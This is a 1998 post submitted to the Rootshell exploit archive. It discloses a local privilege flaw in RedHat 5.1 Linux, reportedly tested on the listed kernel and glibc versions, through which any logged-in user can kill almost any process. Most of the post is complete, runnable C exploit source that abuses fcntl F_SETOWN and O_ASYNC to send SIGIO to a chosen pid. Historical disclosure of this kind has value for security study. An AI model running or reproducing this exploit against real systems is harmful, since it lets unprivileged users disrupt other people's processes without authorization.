[ http://www.rootshell.com/ ]

From dibbler@umd.umich.edu Fri Nov 13 11:36:32 1998
Date: Fri, 13 Nov 1998 14:25:29 -0500 (EST)
From: Ryan Dibble <dibbler@umd.umich.edu>
To: submission@rootshell.com
Subject: kill almost any process in (RedHat 5.1) Linux without root

The code below will result in the termination of almost any process no
matter who owns it. The good news is that init, kflushd, kswapd, and klogd
appear not to be effected. In order to run this the user must have login
access to the machine. This code has been tested on two different machines
running RedHat 5.1 with the following packages:

kernel-2.0.34-0.6
glibc-2.0.7-13
glib-1.0.1-2
glibc-debug-2.0.7-13
glibc-devel-2.0.7-13
glibc-profile-2.0.7-13

===== BEGIN shits.c =====
#include <fcntl.h>
#include <errno.h>
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

int main(int argc, char *argv[]) {
  int s, p;
  if (argc != 2) {
    fputs("Please specify a pid to send signal to.\n", stderr);
    exit(0);
  } else {
    p = atoi(argv[1]);
  }
  fcntl(0,F_SETOWN,p);
  s = fcntl(0,F_GETFL,0);
  fcntl(0,F_SETFL,s|O_ASYNC);
  printf("Sending SIGIO - press enter.\n");
  getchar();
  fcntl(0,F_SETFL,s&~O_ASYNC);
  printf("SIGIO send attempted.\n");
  return 0;
}
===== END shits.c =====